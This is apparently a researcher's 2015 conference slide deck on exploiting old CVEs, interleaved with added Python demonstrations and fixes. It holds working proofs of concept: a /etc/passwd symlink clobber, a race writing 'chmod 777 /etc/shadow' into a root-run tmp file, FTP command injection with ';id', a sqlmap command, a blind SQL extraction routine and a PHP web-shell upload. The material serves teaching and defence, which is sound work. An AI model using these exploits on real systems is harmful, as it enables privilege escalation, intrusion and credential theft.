Fun with Exploits Old and New How software is expected to behave, how it really behaves and how we can exploit it Larry W. Cashdollar 11/13/2015 V1.9


Page 1: Fun with exploits old and new

Fun with Exploits Old and New
How software is expected to behave, how it really behaves and how we can exploit it

Larry W. Cashdollar
11/13/2015
V1.9

Page 2: Fun with exploits old and new

Who Am I

• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 100+ Vulnerabilities discovered
• Formerly Unix Systems Administrator, 17 years
• Penetration Tester back in the late 90s
• Enjoy Writing and Breaking Code
• This is my second time speaking in public

Page 3: Fun with exploits old and new

Terminology

• CVE – Common Vulnerabilities and Exposures
• Root shell – gaining access to the administrative user on a Unix system
• Web shell – a web based shell used to access the system via HTTP
• Vulnerability – a flaw in a piece of software
• PoC – Proof of Concept

Page 4: Fun with exploits old and new

What is this all about?

• Concepts
• Methodologies
• Mind set
• How can I break this?
• Think like a hacker

Page 5: Fun with exploits old and new

Why bother hacking stuff?

• Improves software security
• Improves stability
• It’s like solving a puzzle
• Can be a lot of fun
• Improves your skills
• And……..

Page 6: Fun with exploits old and new

Exploiting a vulnerability you found feels like

Page 7: Fun with exploits old and new

Some common Vulnerabilities

• LFI (Local File Inclusion)
• RFI (Remote File Inclusion)
• RCE (Remote Command Execution)
• Race Condition
• SQL Injection
• XSS (Cross Site Scripting)
• Command Injection

Page 8: Fun with exploits old and new

Concepts

• Unchecked user input
• User input is expected to behave
• Abuse program flow
• Unintended functionality
• Abuse software privilege

Page 9: Fun with exploits old and new

Examples: Old

Page 10: Fun with exploits old and new

IRIX Midikeys: CVE-1999-0765

Page 11: Fun with exploits old and new

CVE-1999-0765: setuid root binary abuse

• Binary executes with root privileges
• Allows modification of sensitive system files

Page 12: Fun with exploits old and new

Exploit CVE-1999-0765

• Open /etc/passwd as a .wav file
• Or export WINEDITOR=/usr/X11/bin/xterm

Page 13: Fun with exploits old and new

Sawmill LFI & weak encryption CVE-2000-0589 & 0588

• Log analysis server listens on port 8987
• LFI can read the first line of any world-readable file
• Admin password stored in a local file
• Admin password "encrypted" with a custom algorithm (a fixed single-character substitution, which the PoC below simply reverses)

Page 15: Fun with exploits old and new
Page 16: Fun with exploits old and new

PoC for CVE-2000-0589 & 0588

#include <stdio.h>
#include <string.h>

/* Sawmill's "encryption" is a fixed substitution: character i of encode
   stands for character i of alpha. Both tables are 55 characters long. */
const char *alpha  = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|";
const char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{
  int x, y;
  char cypher[128];

  if (argc != 2) {
    fprintf (stderr, "usage: %s <encoded password>\n", argv[0]);
    return 1;
  }

  /* strncpy does not NUL-terminate on overflow; terminate explicitly. */
  strncpy (cypher, argv[1], sizeof (cypher) - 1);
  cypher[sizeof (cypher) - 1] = '\0';

  /* For every ciphertext character, find its position in encode and
     print the character at the same position in alpha. */
  for (x = 0; x < strlen (cypher); x++) {
    for (y = 0; y < strlen (encode); y++)
      if (cypher[x] == encode[y]) {
        printf ("%c", alpha[y]);
        break;
      }
  }

  printf ("\n\"+\" could also be a space [ ]\n");
  return 0;
}

• Decrypted password was ‘wookie’
• Access to modify administrative control panel
• Developer gave me a free license

Page 17: Fun with exploits old and new

Solaris catman file clobbering vulnerability CVE-2000-0095

• Creates files in /tmp insecurely
• Uses guessable filenames
• Doesn’t check to see if the file already exists
• Creates files in /tmp as /tmp/sman_PID
• We can guess the next filename and symlink it to /etc/passwd

Page 18: Fun with exploits old and new

PoC

#!/usr/local/bin/perl -w
# http://vapid.dhs.org
use strict;

my $clobber = "/etc/passwd";   # file to clobber
my $X  = getpgrp();            # starting guess for catman's next PID
my $Xc = $X;                   # remember the first guess
my $Y  = $X + 1000;            # guess the next 1000 PIDs

# Pre-create /tmp/sman_<pid> for every guessed PID as a symlink to the
# target, so that when catman opens "its" file it writes through the link.
while ($X < $Y) {
    print "Linking /tmp/sman_$X to $clobber :";
    # Change $clobber to what you want to clobber.
    if (symlink ($clobber, "/tmp/sman_$X")) {
        print "Success\n";
    } else {
        print "failed, Busy system?\n";
    }
    $X = $X + 1;
}

# Watch /tmp and see if catman is executed in time.
while (1) {
    my $list = "/usr/bin/ls -l /tmp | grep sman | grep root |";
    open (LIST, $list) or die "cant open ls...\n";
    while (<LIST>) {
        my @args = split "_", $_;
        chop ($args[1]);
        if ($args[1] >= $Xc && $args[1] <= $Y) {
            print "Looks like pid $args[1] is the winner\n cleaning....\n";
            `/usr/bin/rm -f /tmp/sman*`;
            exit (1);
        }
    }
    close (LIST);
}

Page 19: Fun with exploits old and new

Exploit Results

• /etc/passwd overwritten with contents of sman_pid
• System hosed

Page 20: Fun with exploits old and new

Exploits: New

Page 21: Fun with exploits old and new

Centrify CVE-2012-6348 /tmp race condition local root

• Administrative control daemon for system management
• Creates a file in /tmp as centrify.cmd.0
• Executes that file as a shell script!
• Executes as root!

Page 22: Fun with exploits old and new

CVE-2012-6348 PoC

Wins the race condition 50% of the time:

$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0; done

After the system is refreshed via an administrative control job:

$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow

Page 23: Fun with exploits old and new

CVE-2012-6348 Better PoC

• Wins the race condition 100% of the time
• Written in C
• Uses the inotify API to detect creation and modification of the file, and writes the payload the moment the daemon creates it
• Too long to display here
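Both the catman and the Centrify bugs come down to the same pattern: a privileged program opens a predictable name under /tmp with O_CREAT but without O_EXCL or O_NOFOLLOW, so whoever plants that name first decides where the write goes. The Python example below is added here (it is not the author's PoC or any vendor code) and replays the clobber in a scratch directory standing in for /tmp, then shows the two opens that close the hole. The PID 4242, the sman_<pid> name and the fake passwd line are assumptions mirroring the slides.

```python
import os
import shutil
import tempfile


def predictable_name(tmpdir, pid):
    # catman-style name: the PID is all an attacker has to guess (assumption).
    return os.path.join(tmpdir, "sman_%d" % pid)


def plant_symlink(tmpdir, pid, target):
    """Attacker step: create the guessed name first, as a symlink to the
    file we want the privileged program to overwrite."""
    os.symlink(target, predictable_name(tmpdir, pid))


def vulnerable_write(tmpdir, pid, data):
    """Victim pattern (catman, Centrify): O_CREAT without O_EXCL or
    O_NOFOLLOW, so an attacker-planted symlink is silently followed."""
    fd = os.open(predictable_name(tmpdir, pid),
                 os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o644)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def hardened_write(tmpdir, pid, data):
    """Same name, hardened open: O_EXCL fails if anything (a symlink
    included) already exists at the path; O_NOFOLLOW refuses symlinks."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(predictable_name(tmpdir, pid), flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def mkstemp_write(tmpdir, data):
    """The real fix: let the OS pick an unguessable name and create it
    atomically with O_EXCL (tempfile.mkstemp); nothing to pre-plant."""
    fd, path = tempfile.mkstemp(prefix="sman_", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def run_demo():
    """Play attacker and victim in a scratch dir standing in for /tmp."""
    tmpdir = tempfile.mkdtemp()
    try:
        target = os.path.join(tmpdir, "passwd")  # stand-in for /etc/passwd
        with open(target, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed sample line
        pid = 4242  # assumed: the PID the attacker guessed for the next run
        plant_symlink(tmpdir, pid, target)

        # Vulnerable open follows the symlink and clobbers the target.
        vulnerable_write(tmpdir, pid, "GARBAGE\n")
        with open(target) as f:
            clobbered = f.read() == "GARBAGE\n"

        # Hardened open refuses the pre-planted name instead of following it.
        try:
            hardened_write(tmpdir, pid, "GARBAGE\n")
            hardened_refused = False
        except OSError:
            hardened_refused = True

        safe_path = mkstemp_write(tmpdir, "ok\n")
        return {
            "clobbered": clobbered,
            "hardened_refused": hardened_refused,
            "safe_name_is_unguessable":
                os.path.basename(safe_path) != "sman_%d" % pid,
        }
    finally:
        shutil.rmtree(tmpdir)


if __name__ == "__main__":
    print(run_demo())
```

The Centrify case differs only in what happens after the open: the daemon reads the file back and executes it as root, so the attacker appends a command instead of pointing a symlink at a target. The fix is the same: create the file with an unguessable name and O_EXCL, and never execute anything from a world-writable directory.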

Page 24: Fun with exploits old and new

Ftpd ruby gem command injection CVE-2013-2512

• FTP server developed in Ruby
• Code examination reveals remote command injection (ftpd gem, lines 208-220):

def ls(ftp_path, option)
  path = expand_ftp_path(ftp_path)
  dirname = File.dirname(path)
  filename = File.basename(path)
  command = [
    'ls',
    option,
    filename,          # <-- unsanitized user controlled input
    '2>&1',
  ].compact.join(' ')
  if File.exists?(dirname)   # <-- the directory has to exist for ls to run
    list = Dir.chdir(dirname) do
      `#{command}`           # <-- passed to the shell here

Page 25: Fun with exploits old and new

CVE-2013-2512 PoC

$ ftp localhost
Connected to localhost.
220 ftpd
Name (localhost:root): anonymous
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
* I already created the filename foobar by uploading a file
ftp> ls foobar;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
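The ftpd bug is the generic shell-string pattern: the command is built by joining strings and handed to a shell, so a `;` in the filename ends the ls command and starts another one. The Python example below is added here (it is not the gem's code) and runs both the vulnerable form and the argv-list form against a scratch directory containing a file named foobar; the injected `echo INJECTED` stands in for the slide's `id`, so the demo never runs anything beyond ls and the shell builtin echo.

```python
import os
import shutil
import subprocess
import tempfile


def vulnerable_ls(workdir, option, filename):
    """Mirrors the gem: join the pieces into one string and let /bin/sh
    parse it, so anything the shell treats specially in `filename`
    (; | & $( ) backticks) is honoured as shell syntax."""
    command = " ".join(p for p in ["ls", option, filename, "2>&1"] if p)
    proc = subprocess.run(command, shell=True, cwd=workdir,
                          capture_output=True, text=True)
    return proc.stdout


ALLOWED_OPTIONS = {None, "-l", "-a", "-la"}


def safe_ls(workdir, option, filename):
    """Hardened form: no shell at all. argv is a list, so `filename` is one
    argument however many metacharacters it contains; the option is
    allow-listed and the name is confined to a single path component."""
    if option not in ALLOWED_OPTIONS:
        raise ValueError("unsupported ls option: %r" % option)
    if filename != os.path.basename(filename) or filename.startswith("-"):
        raise ValueError("bad filename: %r" % filename)
    argv = [p for p in ["ls", option, filename] if p]
    proc = subprocess.run(argv, cwd=workdir, capture_output=True, text=True)
    return proc.stdout  # an unknown file just yields an ls error on stderr


def run_demo():
    """Constructed scenario: a scratch dir with the uploaded file foobar."""
    workdir = tempfile.mkdtemp()
    try:
        open(os.path.join(workdir, "foobar"), "w").close()
        payload = "foobar;echo INJECTED"   # stands in for `foobar;id`
        return {
            "vulnerable": vulnerable_ls(workdir, "-l", payload),
            "safe": safe_ls(workdir, "-l", payload),
            "safe_legit": safe_ls(workdir, "-l", "foobar"),
        }
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    for k, v in run_demo().items():
        print("%s:\n%s" % (k, v))
```

Run it and the vulnerable output lists foobar and then prints INJECTED on its own line; the safe call with the same payload prints nothing on stdout because ls was asked, literally, for a file called `foobar;echo INJECTED`.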

Page 26: Fun with exploits old and new

wp-powerplaygallery vulnerable SQL injection code CVE-2015-5599

upload.php, line 131:

$query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";

upload.php, line 133:

$wpdb->query($query);

Page 27: Fun with exploits old and new

Blind SQLi Exploit

• Sqlmap

$ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql --level 5 --risk 3
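What sqlmap is automating here, as an added example (not the plugin's code and not the author's): because albumid is spliced into the INSERT unquoted, a scalar subquery in its place decides which category_id gets stored, and that is enough of a side channel to read the admin password one character at a time. An in-memory SQLite database with a constructed wp_users row stands in for the MySQL backend; the table layout, the admin login and the 'wookie' password are assumptions. The parameterised version at the end shows the same payload being stored as inert text, which is what $wpdb->prepare() gives you in WordPress.

```python
import sqlite3
import string


def make_db():
    """Constructed stand-in for the WordPress database (MySQL in reality)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES ('admin', 'wookie')")  # sample row
    db.execute("CREATE TABLE wp_pp_images (id INTEGER PRIMARY KEY, "
               "category_id INTEGER, image TEXT)")
    return db


def last_category_id(db):
    """Stand-in for the attacker's observation channel: in the real plugin
    the image lands in whichever album category_id names, and that shows."""
    return db.execute("SELECT category_id FROM wp_pp_images "
                      "ORDER BY id DESC LIMIT 1").fetchone()[0]


def vulnerable_insert(db, albumid, name):
    """Mirrors upload.php line 131: albumid spliced in unquoted and
    unescaped (name is unescaped too, but we only need one hole)."""
    query = ("INSERT INTO wp_pp_images (category_id, image) VALUES ("
             + albumid + ",'" + name + "')")
    db.execute(query)
    return last_category_id(db)


def safe_insert(db, albumid, name):
    """Hardened form: bound parameters. The payload is data, never SQL."""
    db.execute("INSERT INTO wp_pp_images (category_id, image) VALUES (?, ?)",
               (albumid, name))
    return last_category_id(db)


def extract_password(db, length):
    """Boolean-based blind extraction: each probe makes category_id 1 or 0
    depending on one character of the admin password."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in string.ascii_lowercase + string.digits:
            probe = ("(SELECT CASE WHEN substr(user_pass,%d,1)='%s' "
                     "THEN 1 ELSE 0 END FROM wp_users "
                     "WHERE user_login='admin')" % (pos, ch))
            if vulnerable_insert(db, probe, "probe.jpg") == 1:
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("recovered:", extract_password(db, 6))
    print("bound parameter stored as:", repr(safe_insert(db, "1 OR 1=1", "x.jpg")))
```

Each character costs at most 36 uploads with this alphabet; sqmap's --level 5 --risk 3 is doing the same thing with a wider set of probe templates and a binary search over the character range rather than a linear scan.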

Page 28: Fun with exploits old and new

wp-powerplaygallery vulnerable RFI code CVE-2015-5681

upload.php, lines 50-57:

$targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_ uploadfolder';
$cleanupTargetDir = true; // Remove old files
$maxFileAge = 5 * 3600; // Temp file age in seconds

// Create target dir
if (!file_exists($targetDir)) {
    @mkdir($targetDir);
}

...

upload.php, lines 148-151:

// Read binary input stream and append it to temp file
if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
}

...

upload.php, lines 158-160:

while ($buff = fread($in, 4096)) {
    fwrite($out, $buff);
}

Page 29: Fun with exploits old and new

RFI Exploit Requirements

• POST request
• Variable albumid must point at an existing album in the database
• File to upload must exist locally
• Use the c99 shell as our payload
• file variable contains the payload, given by its local full path
• name variable contains our filename

Nothing in the upload handler checks the name or contents of the file before writing it under the web root, which is why a PHP web shell can be uploaded and then fetched over HTTP. Strictly speaking this is an unrestricted file upload rather than remote file inclusion: the payload travels in the request body from the attacker's machine, it is not included from a remote URL.

Page 30: Fun with exploits old and new

PoC Exploit

<?php
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
$file_name_with_full_path = '/var/www/shell.php';
echo "POST to $target_url $file_name_with_full_path";
// The '@' prefix makes curl send the local file as a multipart upload.
$post = array('albumid' => '4', 'name' => 'shell.php', 'file' => '@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>

Page 31: Fun with exploits old and new

Questions?

• [email protected]
• http://www.vapidlabs.com
• Twitter @_larry0